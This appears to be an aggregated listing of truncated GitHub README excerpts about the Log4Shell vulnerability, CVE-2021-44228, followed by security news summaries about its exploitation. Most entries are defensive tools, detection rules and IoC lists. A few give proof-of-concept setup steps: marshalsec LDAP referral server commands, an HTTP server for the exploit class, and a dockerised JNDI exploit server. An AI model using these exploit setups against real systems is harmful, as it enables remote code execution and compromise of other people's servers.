log4j-aws-appenders Appenders for Log4J 1x, Log4J 2x and Logback that write to various AWS destinations: CloudWatch Logs: AWS-native centralized log management, providing keyword and time range search Kinesis Streams: the first step in a logging pipeline that feeds Elasticsearch and other analytics destinations SNS: useful for real-time error notifications In addition to

Log4jPatch This is a POC of a simple tool which injects a Java agent into a running JVM process The agent will patch the lookup() method of all loaded orgapachelogginglog4jcorelookupJndiLookup instances to unconditionally return the string "Patched JndiLookup::lookup()" This should fix the CVE-2021-44228 remote code execution vulnerability in Log4j without res

Log4j2-CVE-2021-44228 Remote Code Injection In Log4j

CVE-2021-44228 PoC 環境 Java 11 Maven LDAPサーバの準備 git clone githubcom/mbechler/marshalsecgit cd marshalsec/ mvn clean package -DskipTests java -cp target/marshalsec-*-SNAPSHOT-alljar marshalsecjndiLDAPRefServer localhost:8000/#Command 9999 Java側の準備 以下のようにして localhost:8000/Co

CVE-2021-44228-Test-Server A small server for verifing if a given java program is succeptibel to CVE-2021-44228 Usage Build the program using go build -o listenerexe This should give you a small executable for your platform Use the Go cross compile feature if you need the executable for another platform Once you have the executable you can run it using: $ listener

Spigot Log4J Patch Mojang was logging the commant chat message as "format" not an "argument" to be replaced by the "format" Which allowed the advisory an access to the JdniLookup to initiate the remote code injection attack Exploiting the JDNI Reference attack has been known before But, the MinecraftServer#sendMessage allowed the attacker an acc

Critical Version Enforcer This mod simple enforce a specific version of Minecraft Forge to make sure security related versions are installed Note: If your Minecraft Forge is crashing because of this mod, please update to a newer version! Version History 118 118-38017: CVE-2021-44228 1171 1171-3711: CVE-2021-44228 1165 1165-36220: CVE-2021-44228

Log4jNuclei CVE-2021-44228 Log4j for nuclei

CVE-2021-44228 This repository contains a set of YARA rules for detecting versions of log4j which are vulnerable to CVE-2021-44228 by looking for the signature of JndiManager prior to 2150 Although there is a number of resources available for detecting insecure use of log4j using CodeQL or Semgrep, there have not yet been any resources made available for detection of potenti

CVE-2021-44228(Apache Log4j Remote Code Execution) Affected versions < 2150 Useage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/main/java javac Exploitjava python -m SimpleHTTPServer 8888 cd tools java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer "http

Log4Shell sample vulnerable application (CVE-2021-44228) This is an almost copy/similar vulnerable application to githubcom/christophetd/log4shell-vulnerable-app The main differences are maven instead of gradle, and the usage of rogue-jndi This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 26

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs search for malicious strings decode payloads print results to stdout or file report ips (incl logs) to AbuseIPDB Scanning Directory: python3 jndiReppy -d /path/to/directory File: python3 jndiReppy -f /path/to/inputtxt Custom filter: python3 jndiReppy -g "ldap" Threading: If scanning a direc

A sample code of Log4j Security Vulnerabilities by githubcom/xinyuz Description from Apache Fixed in Log4j 2150 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints Severity: Critical Base CVSS Score: 100 CVSS:30/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Versions Affected: all versions from 20-beta

J4Ndiss JNDI Exploit Server for exploiting #log4shell (CVE-2021-44228) To start the server, customize the port exposure within the command: $ docker build -t jandis . $ docker run --rm -it -p 8088:8088 -p 3789:3789 --name jndi jandis

Exploit number - CVE-2021-44228 Exploit info topics: www.opennet.ru/opennews/art.shtml?num=56319 www.lunasec.io/docs/blog/log4j-zero-day/ Exploit: github.com/tangxiaofeng7/apache-log4j-poc About utility: A simple console utility that removes the vulnerable line from log4j2 How to use: To use the utility, open it as an executable file. Then, in the consol

log4shell-mitigation Mitigation for Log4Shell Security Vulnerability CVE-2021-44228

log4j-patcher Java Agent that disables Apache Log4J's JNDI Lookup. This is for CVE-2021-44228. If you can, use the latest available version of Log4J, as this was fixed in Log4J 2.15.0. Otherwise, download the log4j-patcher JAR and follow the steps below. How to Use To use Java Agents, you specify them with the -javaagent JVM argument. Example: java -jar -javaagent:path/to/M

CVE-2021-44228 I think this one is more practical (sob): christophetd/log4shell-vulnerable-app. I only looked into this out of curiosity and on impulse, so there are probably vague or incorrect parts. Please proceed at your own risk. Building a reproduction environment. It should work in a Linux environment. 1 jd

log4shell This is a proof of concept for the Log4Shell bug Info github.com/mbechler/marshalsec github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce www.lunasec.io/docs/blog/log4j-zero-day/ Use as tester Because the application logs the LDAP path, this implementation can be used in combination with scanning all your service endpoints J

Log4Shell-Detection Change Log 20211211u1: Creation Tenable blog www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability Identify Log4j installs without running a new scan Log4Shell plugins 155998 - Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check) See note regarding this plugin below 1

log4j CVE-2021-44228 Public IoCs list Public IoCs about log4j CVE-2021-44228 based on Twitter and other social networks (pull requests accepted). IPs

javalogslulz java am i right? what's this? this makes it easier to test if an application is vulnerable to the log4j2 vulnerability (CVE-2021-44228) this is free, so don't ruin it, read license in LICENSE

log4j PowerShell Checker CVE-2021-44228 Perform a scan of a single host (using PowerShell) to see if it's vulnerable to the above-mentioned CVE Extras: added outgoing proxy support Usage Run it like this: .\log4j_ps_checker.ps1 vulnerableserver:8443 Setting up a NameServer Create a new (A) subdomain record for your domain, like log4jcheck.example.com; and Poi

f5-waf-enforce-sigs-CVE-2021-44228 This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device Overview This script enforces all signatures present in the list below related to CVE-2021-44228 across all policies in blocking mode in the Adv WAF/ASM sigs = ['200104768', '200104769', '200004450', '200004451',

log4shell-detector Playbook This simple Ansible Playbook can be used to clone and execute the log4shell-detector python script to detect CVE-2021-44228 exploit attempts in your infrastructure. The playbook will save the findings for each host under reports/{hostname} How to Clone the repository git clone github.com/kaipee/log4shell-detector-playbook.git

Log4Shell_CVE-2021-44228_related_attacks_IOCs

ftb-infinity - latest Feed The Beast Infinity Evolved modpack made by Feed The Beast at feed-the-beast.com Modpack for Minecraft 1.7.10 with Log4j CVE-2021-44228 vulnerability mitigation Infinity Evolved is the general all-purpose pack from the FTB team that is designed for solo play as well as small and medium population servers. The pack for all people. Fastcraft is

log4j---CVE-2021-44228 On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging lib

log4j-poc Poc of log4j2 (CVE-2021-44228)

log4j-log4shell-affected Lists of affected components and affected apps/vendors by CVE-2021-44228 (aka Log4shell or Log4j RCE) for security responders

log4j-snort Snort detection rules for the log4j vulnerability (CVE-2021-44228); see snort.txt for details

horrors-log4shell A micro lab (playground?) for CVE-2021-44228 (log4j) Don't expect the full attack chain to work out of the box. Requirements Kali Linux # apt install default-jdk gradle maven macOS % brew install openjdk gradle maven Installation % git clone github.com/tasooshi/horrors.gi

Apache Log4j 2 arbitrary code execution (CVE-2021-44228) Apache Log4j 2 arbitrary code execution vulnerability (CVE-2021-44228) just for code searching. For research purposes. Don't use to attack. Do not carry out attacks exploiting this vulnerability.

Overview This repository contains OpenIOC rules to facilitate hunting for indicators of compromise related to the Apache Log4j remote code execution vulnerability (CVE-2021-44228) These rules are considered hunting rules as detection efficacy will vary by organization With environment-specific tuning these rules may be suitable for deployment as alerting rules FireEye custom

CVE-2021-44228 nvd.nist.gov/vuln/detail/CVE-2021-44228 log4j.java - modification of [this PoC] (github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce) to run a bunch of payloads from JNDIExploit jndi.pcap - a PCAP of each of these payloads being run snort.rules - Snort rules to detect the LDAP and HTTP connections. Pull requests to make the HTTP ones work a

cve-2021-44228-log4j-mitigation Mitigate against log4j vulnerability

log4j-poc Log4Shell CVE-2021-44228

CVE-2021-44228

Vendia's Blog Welcome to the Vendia blog repo! Contributions, typo fixes and pull requests are welcome. Table of Contents Vendia's Blog Posts Authors How to contribute content TL;DR: 1 Write your content in markdown! 2 Name your post file name 3 In your post, include post meta information: 4 Add your author bio 5 Submit a PR to the repository

FROST-Server A Server implementation of the OGC SensorThings API The Fraunhofer Opensource SensorThings-Server is the first complete, open-source implementation of the OGC SensorThings API Part 1: Sensing. It now also includes preliminary actuation support. FROST & the Log4J2 Log4Shell vulnerability FROST-Server is not vulnerable to the Log4J2 zero day vuln

Per CVE-2021-44228, Apache log4j2 versions < 2.15.0 are vulnerable to remote code execution and data exfiltration. This script will scan your New Relic account(s) for java services that report usage of log4j-core, and generate a manifest containing each suspect service with the version of log4j-core reported by New Relic APM. Note that this script may generate false posi

LDAP OOB Server Used to verify JNDI LDAP injection CVE-2021-44228: Log4j2 remote code exec Usage Start: java -jar ldap-oob.jar API Get an identifier id: GET 127.0.0.1:8080/ldap/register -> id Check whether the identifier id has been triggered via ldap: GET 127.0.0.1:8080/ldap/{id}/access -> boolean Delete the identifier id: POST 127.0.0.1:8080/ldap/{id}/unregister LDAP ldap://127.0.0

Log4J_Version_Checker The purpose of this tool is to allow the user to check the version of Log4J installed on their machine I created this utility in response to CVE-2021-44228 to help my IT department to find the version number once we identified machines with the JAR located on it It's a pretty simple script that uses the following syntax: python Log4J_Version_Checke

log4j2-CVE-2021-44228-poc-local Just a personal proof of concept of CVE-2021-44228 on log4j2

Log4JShell Bytecode Detector This repository contains a tool to detect if a jar file is affected by the critical CVE-2021-44228. The tool scans the jar file and compares the classes against a set of vulnerable hashes for classes within the jar file. The hashes have been pre-computed for artifacts on Maven Central. How to run this tool Download the jar file under releases Run

sample-vulnerable-log4j-direct-lib A library that has a direct dependency on a vulnerable log4j version (CVE-2021-44228) This library is used by github.com/sgtest/sample-vulnerable-log4j-indirect-app Related repositories The following repositories are used to demonstrate Sourcegraph functionality related to fixing CVE-2021-44228: github.com/sgtest/sample-vuln

log4j-detector Detects log4j versions on your file-system, including deeply recursively nested copies (jars inside jars inside jars). Works on Linux, Windows, and Mac, and everywhere else Java runs, too! Example usage: java -jar log4j-detector-2021.12.13.jar [path-to-scan] > hits.txt Caveats It currently skips directories / files that the current user does not have permiss

Log4J lab Description This is a lab for playing around with the Log4J CVE-2021-44228 Springboot app + Log4J 2.6.1 Usage ./gradlew bootRun

This is a simple fork of James Kettle's excellent Collaborator Everywhere, with the injection parameters changed to payloads for the critical log4j CVE-2021-44228 vulnerability This extension only works on in-scope traffic, and works by injecting headers into your proxy traffic with log4j exploits To avoid false positives with pingbacks such as with DNS requests made fro

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from [github.com/christophetd/log4shell-vulnerable-app] (because I'm lazy to find live target xD) so you can develop or change this code according to your knowledge ;) Requirements python 3.x pip Installation pip install -r requirements

Mulgara Semantic Store (Mulgara) Installation Guide Table of Contents Introduction Directory Layout Release Notes Installing Java Building Mulgara Building Mulgara in Eclipse Running a Mulgara Server Mulgara Server Options License Note about log4j On 2021-12-10 CERT NZ issued an advisory that CVE-2021-44228 was being actively exploited This means that JNDI lookup

j4shell_ioc_ips big dump of known j4log/j4shell malicious IP addresses, unique and sorted, updated every 10 minutes! sources: gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217 github.com/Akikazuu/Apache-Log4j-RCE-Attempt github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs gist.github.com/ycamper/26e021a2b5974049d113738d51e764

Log4j Detection You can use this YARA rule to detect the presence of Log4j and then determine whether it is vulnerable to Log4Shell (CVE-2021-44228) or not. If it is, then you can use the mitigations listed below to handle this situation. In the Package folder you can find a collected package which includes the YARA executable, the rule file (log4j.yar), and cmd\bash scripts for runnin

Log4j Scans github.com/fullhunt/log4j-scan log4shell.huntress.com/ www.cyberdrain.com/monitoring-with-powershell-detecting-log4j-files/ research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/ github.com/hillu/local-log4j-vuln-scanner github.com/omrsafetyo/PowerShellSnippets/blob/master/In

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs Fuzzing for more than 60 HTTP request headers (not only the 3-4 headers used by previously seen tools) Fuzzing for HTTP POST Data parameters Fuzzing for JSON data parameters Supports DNS callback for vulnerability discovery and validation WAF Bypass

Hi, I'm Daniel Quadros, an old-timer developer from Brazil. I'm currently working on ATmega Detonator. I'm currently learning Spring, SpringBoot and Angular (long story why). All of my projects are available at github.com/dquadros I regularly write articles on dqsoft.blogspot.com How to reach me dqsoftblogspot@gmail.com Know about

Log4Find Log4Find is a simple scanning tool to detect systems vulnerable to and/or compromised by the Log4Shell vulnerability (CVE-2021-44228) Usage There are two binaries: one for Linux systems and another one for Windows systems. Please refer to the doc in the proper folders "windows" and "linux" inside this project for more information. Detection logic The ma

Minzomat Minzomat makes your server aminzing™ by adding the following stuff: Write your own embeds / Allows you to send an embed just like a normal message Quote messages / Allows you to show what another user wrote some time ago inside an embed Large reactions [WIP] React on a message with the :minzomat: emoji and the bot will display all reactions in one lar

orgshanekingdemocvey2021s44228 CVE-2021-44228

Security-Log4J-Tester The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell

DICOM+ for: anonymizing DICOM files viewing DICOM files as either images or the meta-data as text editing DICOM files uploading DICOM files to a PACS Note: This software is not vulnerable to the log4j exploit CVE-2021-44228 Licensed under the Apache License, Version 2.0 Developer: Jim Irrer irrer@umich.edu Download latest pre-built package Latest release: 07-Dec-2020 To Ru

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patching. It also supports nested JAR file scanning and patching. Download log4j2-scan 1.3.1 (Windows x64) If the native executable doesn't work, use the JAR instead. 32-bit is not supported. log4j2-scan 1.3.1 (Linux x64) If the native executable doesn't work, use the JAR i

log4jail A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J (Log4Shell aka CVE-2021-44228) attacks Table of Contents Introduction Installation Quick Start Proof of Concept For Pentesters Introduction log4jail is a quick and dirty solution to block Log4Shell exploit attempts by acting as a reverse proxy scanning complete request body incl

log4j-elasticbeanstalk-remove Scripts to remove unused log4j.jar from AWS Elastic Beanstalk Tomcat images and mitigate CVE-2021-44228 Log4Shell attacks The issue CVE-2021-44228 is a serious security issue for users of Log4j. This applies to any Java application that is actively using log4j-impl.jar. Many Java applications contain or use log4j-api.jar, which only contain the A

log4shelldetect Scans a file or folder recursively for jar files that may be vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the jar. If you only want possibly vulnerable jars to be printed rather than all jars, run with -mode list License Code here is released to the public domain under unlicense. With the exception of velocity-1.1.9.jar which is

CVE-2021-44228_scanner Scanners for Jar files that may be vulnerable to CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be installed on a workstation or server, either by running the Python app/app.py script directly (you'll need python3, Flask, and Requests) or as a Docker container. You will need to set some environment variables (or hard-code

Java Settlers A desktop client-server version of Settlers of Catan Introduction JSettlers is a Java version of the board game Settlers of Catan written in Java This client-server system supports multiple simultaneous games between people and computer-controlled opponents Initially created as an AI research project The client can host a server, connect to dedicated JSettlers

log4j-cve Apache Log4j Zero Day Vulnerability aka Log4Shell aka CVE-2021-44228

Get-log4j-Windows.ps1 Identifying all log4j components across all windows servers, entire domain, can be multi domain CVE-2021-44228 Get-log4j-Windows-v1.ps1 Author: Keith Waterman Date: 15-Dec-2021 Description: Made for CVE-2021-44228 Searches AD for all Computer objects with filter (M

Recent Articles

Log4j Vulnerabilities: Attack Insights
Symantec Threat Intelligence Blog • Siddhesh Chandrayan • 23 Dec 2022

Symantec data shows variation and scope of attacks.

Posted: 23 Dec, 2021. Apache Log4j is a Java-based logging utility. The library’s main role is to log information related to security and performance to make error debugging easier and to enable applications to run smoothly. The library is part of the Apache Logging Services, a project of the A...

Apache Log4j Zero-Day Being Exploited in the Wild
Symantec Threat Intelligence Blog • Threat Hunter Team • 11 Dec 2022

Symantec products will protect against attempted exploits of critical CVE-2021-44228 vulnerability

Posted: 11 Dec, 2021. A zero-day vulnerability (CVE-2021-44228) has been discovered in Apache Log4j which, if exploited, could permit a remote attacker to execute arbitrary code on vulnerable systems. Exploit code for this vulnerability, ...

Ransomware: How Attackers are Breaching Corporate Networks
Symantec Threat Intelligence Blog • Karthikeyan C Kasiviswanathan Vishal Kamble • 28 Apr 2022

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Posted: 28 Apr, 2022. Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most freq...

Stonefly: North Korea-linked Spying Operation Continues to Hit High-value Targets
Symantec Threat Intelligence Blog • Threat Hunter Team • 27 Apr 2022

Espionage group focuses on obtaining classified or sensitive intellectual property that has civilian and military applications.

Posted: 27 Apr, 2022. The North Korean-linked Stonefly group is continuing to mount espionage attacks against highly specialized engineering companies with a likely goal of obtaining sensitive...

Public interest in Log4Shell fades but attack surface remains
BleepingComputer • Bill Toulas • 26 Apr 2022

It’s been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.
Although the public interest and focus of the infosec community have moved to newer vulnerabilities and exploits,
continues to be a large-scale problem and a grave security risk.
The last time we touched the subject of Log4Shell exploitation was roughly two m...

Mirai malware now delivered using Spring4Shell exploits
BleepingComputer • Bill Toulas • 08 Apr 2022

The Mirai malware is now leveraging the Spring4Shell exploit to infect vulnerable web servers and recruit them for DDoS (distributed denial of service) attacks.
Spring4Shell is a
tracked as CVE-2022-22965, affecting Spring Framework, a widely used enterprise-level Java app development platform.
Spring released emergency updates to 
 a few days after its discovery, but threat actors' exploitation of vulnerable deployments was already underway.
While&...

APT41 Spies Broke Into 6 US State Networks via a Livestock App
Threatpost • Lisa Vaas • 09 Mar 2022

USAHerds – an app used (PDF) by farmers to speed their response to diseases and other threats to their livestock – has itself become an infection vector, used to pry open at least six U.S. state networks by one of China’s most prolific state-sponsored espionage groups.
In a report published by Mandiant on Tuesday, researchers described a prolonged incursion conducted by APT41. They detected the activity in May 2021 and tracked it through last month, February 2022, observing the spy g...

NHS urges orgs to apply security update for Okta Client RCE bug
BleepingComputer • Bill Toulas • 25 Feb 2022

The UK's NHS Digital agency is warning organizations to apply new security updates for a remote code execution vulnerability in the Windows client for the Okta Advanced Server Access authentication management platform.
"NHS Digital is the national digital, data and technology delivery partner for the NHS and social care system," explains 
 for NHS Digital.
In an
released yesterday, all organizations are advised to apply the latest patches for the Okta Advanced...

‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet
Threatpost • John Hammond • 04 Feb 2022

Jen Easterly, the director of the Cybersecurity and Infrastructure Security Agency (CISA), stated in a public news interview that the now-infamous Log4j flaw is the “the most serious vulnerability that [she has] seen in her career.” It’s not a stretch to say the whole security industry would agree.
December of 2021 will be looked back on with a tinge of trauma and dread for incident responders, system administrators and security practitioners. You all probably already know— on Dece...

Dutch cybersecurity agency warns of lingering Log4j risks
BleepingComputer • Sergiu Gatlan • 22 Jan 2022

In a warning issued on Thursday, the Dutch National Cybersecurity Centre (NCSC) says organizations should still be aware of risks connected to Log4j attacks and remain vigilant for ongoing threats.
Even though the aftermath of recent incidents connected to Log4Shell exploitation was "not too bad" because many organizations have acted quickly to mitigate these critical vulnerabilities, the NCSC says that threat actors are most likely still planning to breach new targets. 
"It is ex...

Microsoft: Attackers Tried to Login to SolarWinds Serv-U Via Log4j Bug
Threatpost • Lisa Vaas • 20 Jan 2022

Attackers are trying to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.
This is a confusing story: Initially, Microsoft had warned on Wednesday that attackers were exploiting a previously undisclosed vulnerability in the SolarWinds Serv-U file-sharing software to propagate Log4j attacks against networks’ internal devices via the SolarWinds bug.
SolarWinds had issued a fix the day before, on Tuesday.
SolarWinds subsequently reached...

The Threat Landscape in 2021
Symantec Threat Intelligence Blog • Threat Hunter Team • 19 Jan 2022

Symantec takes a look at the cyber security trends that shaped the year

Posted: 19 Jan, 2022. From the evolving ransomware ecosystem to attacks against critical infrastructure, Symantec looks back over the cyber-security trends that shaped 2021.

A new whitepaper from Symantec, a division of Broadcom Software, takes a look back at some of t...

The Log4j Vulnerability Puts Pressure on the Security World
Threatpost • Saryu Nayyar • 18 Jan 2022

It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.
First of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the most serious vulnerability she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberatta...

The Week in Ransomware - January 14th 2022 - Russia finally takes action
BleepingComputer • Lawrence Abrams • 14 Jan 2022

Today, the Russian government announced that they
on behalf of US authorities.
While the ransomware gang members are only being charged with "illegal circulation of means of payment," the arrests are the first public action by Russia to stem the activities of ransomware gangs operating within the country.
Furthermore, Russia states that they took this action on behalf of US law enforcement, who they have historically been reluctant to help in criminal cybercrime investigation...

Night Sky ransomware uses Log4j bug to hack VMware Horizon servers
BleepingComputer • Ionut Ilascu • 11 Jan 2022

The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor is targeting vulnerable machines exposed on the public web from domains that impersonate legitimate companies, some of them in the technology and cybersecurity sectors.
Spotted in late December 2021 by security researcher MalwareHunterTeam,
. It has encrypted multiple vic...

Four million outdated Log4j downloads were served from Apache Maven Central alone despite vuln publicity blitz
The Register • Gareth Corfield • 11 Jan 2022

It's not as though folks haven't been warned about this

There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository.
That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks.
Tracked as CVE-2021...

NHS warns of hackers exploiting Log4Shell in VMware Horizon
BleepingComputer • Bill Toulas • 07 Jan 2022

UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat group targeting VMware Horizon deployments with Log4Shell exploits.
Log4Shell is an exploit for
, a critical arbitrary remote code execution flaw in the Apache Log4j 2.14, which has been under active and
since December 2021.
Apache addressed the above and four more vulnerabilities via subsequent security updates, and
is now considered adequately secure.
According t...

FTC to Go After Companies that Ignore Log4j
Threatpost • Lisa Vaas • 05 Jan 2022

The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data from the risks of the Log4j vulnerabilities, it warned on Tuesday.
“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” according to the warning.
Those companies that bungle consumer d...

You better have patched those Log4j holes or we'll see what a judge has to say – FTC
The Register • Thomas Claburn in San Francisco • 05 Jan 2022

Apply fixes responsibly in a timely manner or face the wrath of Lina Khan

The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else.
In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late.
The FTC is advising companies to consu...

Microsoft Sees Rampant Log4j Exploit Attempts, Testing
Threatpost • Lisa Vaas • 04 Jan 2022

No surprise here: The holidays brought no Log4Shell relief.
Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library.
“We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” according to Micro...

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools
Threatpost • Elizabeth Montalbano • 30 Dec 2021

Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.
Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack on a large undisclosed academic institution, according to research released Wednesday.
“Aquatic Panda is a China-based [APT] with a dual mission of intelligence c...

Fintech firm hit by log4j hack refuses to pay $5 million ransom
BleepingComputer • Ax Sharma • 29 Dec 2021

One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version.
Soon enough, threat actors approached ONUS to extort a $5 million sum and threatened to publish the customer data should ONUS refuse to comply.
After the company's refusal to pay the ransom, threat actors put up data of nearly 2 million ONUS customers for sale on forums.
On December 9th, the
for the notorious

Log4j 2.17.1 out now, fixes new remote code execution bug
BleepingComputer • Ax Sharma • 28 Dec 2021

Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832.
Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved.
Mass exploitation of the original
(CVE-2021-44228) by threat actors began around December 9th, when a
 for it surfaced on GitHub.
Given Log4j's vast usage in the majority...

The 5 Most-Wanted Threatpost Stories of 2021
Threatpost • Tara Seals • 27 Dec 2021

As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).
While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-re...

‘Hack DHS’ bug bounty program expands to Log4j security flaws
BleepingComputer • Sergiu Gatlan • 22 Dec 2021

The Department of Homeland Security (DHS) has announced that the 'Hack DHS' program is now also open to bug bounty hunters willing to track down DHS systems impacted by Log4j vulnerabilities.
"In response to the recently discovered log4j vulnerabilities, @DHSgov is expanding the scope of our new #HackDHS bug bounty program and including additional incentives to find and patch log4j-related vulnerabilities in our systems," 
DHS Secretary Alejandro N. Mayorkas.
"In partnersh...

Third Log4J Bug Can Trigger DoS; Apache Issues Patch
Threatpost • Lisa Vaas • 20 Dec 2021

No, you’re not seeing triple: On Friday, Apache released yet another patch – version 2.17 – for yet another flaw in the ubiquitous log4j logging library, this time for a DoS bug.
Trouble comes in threes, and this is the third one for log4j. The latest bug isn’t a variant of the Log4Shell remote-code execution (RCE) bug that’s plagued IT teams since Dec. 10, coming under active attack worldwide within hours of its public disclosure, spawning even nastier mutations and leading to t...

Bad things come in threes: Apache reveals another Log4J bug
The Register • Simon Sharwood, APAC Editor • 19 Dec 2021

Third major fix in ten days is an infinite recursion flaw rated 7.5/10

The Apache Software Foundation (ASF) has revealed a third bug in its Log4 Java-based open-source logging library Log4j.
CVE-2021-45105 is a 7.5/10-rated infinite recursion bug that was present in Log4j2 versions 2.0-alpha1 through 2.16.0. The fix is version 2.17.0 of Log4j.
That’s the third new version of the tool in the last ten days.
In case you haven’t been paying attention, version 2.15.0 was created to fix CVE-2021-44228, the critical-rated and trivial-to-exploit remot...

TellYouThePass ransomware revived in Linux, Windows Log4j attacks
BleepingComputer • Sergiu Gatlan • 17 Dec 2021

Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library.
KnownSec 404 Team's Heige first reported these attacks 
on Monday after observing that the ransomware was dropped on old Windows systems using exploits abusing the flaw tracked as CVE-2021-44228 and known as
.
Heige's report was confir...

CISA issues emergency directive to fix Log4j vulnerability
The Register • Thomas Claburn in San Francisco • 17 Dec 2021

Federal agencies have a week to get their systems patched

The US government's Cybersecurity and Infrastructure Security Agency (CISA) on Friday escalated its call to fix the Apache Log4j vulnerability with an emergency directive requiring federal agencies to take corrective action by 5 pm EST on December 23, 2021.
Log4j is a Java-based open source logging library used in millions of applications. Versions up to and including 2.14.1 contain a critical remote code execution flaw (CVE-2021-44228), and the fix incorporated into version 2.15, released...

Log4j attackers switch to injecting Monero miners via RMI
BleepingComputer • Bill Toulas • 16 Dec 2021

Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting t...

Microsoft: Khonsari ransomware hits self-hosted Minecraft servers
BleepingComputer • Sergiu Gatlan • 16 Dec 2021

Microsoft urges admins of self-hosted Minecraft servers to upgrade to the latest release to defend against Khonsari ransomware attacks exploiting the critical Log4Shell security vulnerability.
Mojang Studios, the Swedish video game developer behind Minecraft,
last week to address the bug tracked as 
 in the Apache Log4j Java logging library (used by the game's Java Edition client and multiplayer servers).
While there was no mention of attacks targeting Minecraft serv...

Relentless Log4j Attacks Include State Actors, Possible Worm
Threatpost • Becky Bracken • 15 Dec 2021

Call it a “logjam” of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies’ telemetry using at least 70 distinct malware families — and the fallout from the Log4j vulnerability is just beginning.
Researchers manning keyboards all over the world have spent the past several days chasing attacks aimed at a now-infamous Log4j Java library bug, dubbed Log4Shell (CVE-2021-44228). Side note: Log4j is pronounced,...

SAP Kicks Log4Shell Vulnerability Out of 20 Apps
Threatpost • Lisa Vaas • 15 Dec 2021

SAP has identified 32 apps that are affected by CVE-2021-44228 – the critical vulnerability in the Apache Log4j Java-based logging library that’s been under active attack since last week.
